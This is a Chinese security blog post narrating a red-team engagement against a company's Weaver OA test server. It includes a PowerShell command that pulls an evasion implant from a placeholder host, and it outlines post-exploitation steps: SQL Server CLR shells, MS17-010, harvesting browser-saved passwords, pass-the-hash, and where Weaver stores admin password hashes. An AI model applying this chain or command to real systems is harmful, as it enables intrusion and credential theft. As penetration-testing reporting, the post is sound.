免责声明
由于传播、利用本公众号所发布的而造成的任何直接或者间接的后果及损失,均由使用者本人承担。LK安全公众号及原文章作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢大家!!!
请勿利用文章内的相关技术从事非法测试,由于传播,利用此文所提供的信息而造成的任何直接或者间接的后果与损失,均由使用者本人负责,文章作者不为此承担任何责任
某月,领导又派本安服仔又来参加攻防演练了,瑟瑟发抖的来到现场,心中默默祈祷这次分目标运气能好一点
拿到⽬标清单,⼀眼望过去⼼就凉了半截,全是gov和零星⼏个⺠营企业。经过⼏年的轮番轰炸,政务⽹已经可以算是地狱难度的内⽹了,⽽且设备基本⻬全,哪哪都有探针甚⾄还有蜜罐,以⾄于没有了在gov开点的欲望。
⼏个私企在简单的收集后也是有喜有悲,好消息是其中⼀家某控股集团互联⽹暴露着泛微oa,坏消息是这个泛微oa版本最新⽽且有rasp防护着。
天崩开局下只能做更细致的信息收集了,⼦域名、全端⼝、全资控股、供应链、钓⻥ N板斧挨个上,终于在扫描全端⼝时有了新发现,在某个⼦域名的29080端⼝开着另外⼀个oa也是泛微的。根据经验判断,这应该是测试环境的了,测试环境往往是安全最容易忽略的⼀环,果不出其然,这个站存在soap注⼊和另外⼀个1day接⼝的堆叠⼊,利⽤xpcmd就能执⾏命令。因为有杀软,mshta和powershell都没法直接上线。我⼀般是会使⽤powershell
拉取oss上的免杀⻢执⾏,拉取命令为:
Invoke-WebRequest -Uri 'http://example.com/file.zip' -OutFile 'C:Downloadsfile.zip'
激动的心,颤抖的手,复制粘贴到命令行中,回车启动
成功上线
嘿嘿,小内网,喜不喜欢爸爸的大cs,嗯?说话
不可否认,进内⽹直接⽤⼊⼝机器扫扫扫是⼀个很不好的习惯,⼀旦被发现踢出内⽹连⼝⼦都会⼀起丢了。我个⼈⼀般是优先翻配置⽂件,⼀般oa的⼊⼝数据库都是站库分离的⽽且基本都是sa权限的sql server,可以直接打。不管是mdut还是msf打clr正向shell都很⽅便。在控住另外⼀台机器后再在上⾯搭建正向代理,拿它作为跳板机扫描,从⽽可以降低被运维发现从⽽提出内⽹再也进不来的⻛险。
一个小tips
泛微的后利⽤总结起来⼀般就:weaver.properties获取数据库配置,数据库内HrmResourceManager可以拿到sysadmin的密码hash,普通⽤户信息则在HrmResource。解出hash就能登进去进⼀步发邮件或者流程⽔坑打运维啦。
听懂掌声👏👏👏
成功登陆
在拿到新跳板机之后,便开始alive探活、fscan、zaku三板斧,在内⽹⾥扫出来好⼏个17-010,但是只成功利⽤msf拿下⼀台,发现是⼀台财务的办公机。
从财务办公机浏览器收集到很多保存的密码,拿到了⾦蝶云和⽣产环境oa的权限
⾄于别的010,在与某位练习时⻓两年半不愿透露姓名的⼤佬沟通中得知,可能是因为之前被打过了存在内核后⻔所以⽆法打⼊新的,并在这位⼤佬的协助下clear掉了原有的后⾯并⼿⼯打⼊了⾃⼰的shellcode,上线cs抓取明⽂密码,PTH撞出四台,⼀台⼀台登录发现是财务机,上⾯登录着企业⽹银,余额上亿。
嘿嘿,此时我有一个大胆的想法
已经开始幻想身价上亿之后,香车美女,豪宅别墅,正当我想的流哈喇子的时候,突然想到.....
还是老老实实写报告吧,最后奉劝大家,渗透不规范,亲人两行泪,一定要遵纪守法啊各位大黑客。
技术交流/加群聊
技术群聊已满200人 群内各种福利 欢迎各位师傅进群交流
原文始发于微信公众号(LK安全):什么?一次红队行动差点让我财富自由了
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论